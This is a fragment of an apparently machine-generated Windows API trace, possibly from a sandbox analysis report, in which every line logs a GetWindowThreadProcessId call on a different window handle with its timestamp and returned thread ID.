	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x20f4
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x20e4
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x20e8
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x20ec
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x20f0
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e34
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc38
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1fe4
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f10
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f0c
	[0855.368] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f08
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ef0
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1eec
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ee4
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ed8
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ed0
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e8c
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e88
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e84
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1604
	[0855.369] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c2c
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c08
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c0c
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c10
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c14
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c18
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c1c
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16fc
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e78
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c20
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x191c
	[0855.370] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1748
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1bb4
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10bc
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b50
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x14b4
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x149c
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x14a8
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1490
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x14a4
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x148c
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1458
	[0855.371] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b4c
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b3c
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x19bc
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x199c
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1998
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1994
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1990
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1984
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x197c
	[0855.372] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1978
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1824
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1088
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1908
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x18cc
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x18d0
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1840
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10c4
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x128c
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16e8
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16cc
	[0855.373] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x274
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10e0
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10cc
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10c0
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10d0
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1198
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1080
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1074
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x106c
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1474
	[0855.374] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1414
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xbd0
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x550
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa38
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16d0
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16d4
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x15bc
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x15a0
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x159c
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1598
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1594
	[0855.375] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1590
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x158c
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1588
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1584
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1580
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x157c
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1488
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1404
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x11b8
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xbd4
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe0c
	[0855.376] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xd30
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe70
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x13b8
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe20
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe2c
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe00
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe04
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc94
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x13b0
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x13ac
	[0855.377] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x13a8
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1374
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x132c
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1328
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x12d0
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x12cc
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x12c8
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1290
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1218
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1214
	[0855.378] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x11ec
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x11e8
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x11cc
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1140
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe6c
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x6e8
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc6c
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf94
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xffc
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf74
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf08
	[0855.379] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf0c
	[0855.380] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xed8
	[0855.380] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe90
	[0855.380] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xea8
	[0855.380] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfa8
	[0855.380] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfbc
	[0855.380] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfb8
	[0855.380] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfb4
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfb0
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfac
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfc0
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfd0
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf88
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf84
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf80
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xde0
	[0855.381] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xddc
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xdd8
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xd34
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xd10
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xd0c
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc9c
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc74
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc1c
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc08
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xabc
	[0855.382] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x24c
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xbb0
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xbfc
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb10
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x374
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x368
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb28
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xae8
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb14
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x95c
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa8c
	[0855.383] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x46c
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb3c
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa90
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xad0
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa9c
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xaa0
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb1c
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x7e0
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa74
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x694
	[0855.384] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa28
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x9b0
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x8d8
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x940
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x93c
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4ec
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x150
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x720
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x3c4
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x7d4
	[0855.385] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x6c8
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb54
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb54
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x108f8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x6bc
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb5c
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x838
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x818
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x5b8
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x494
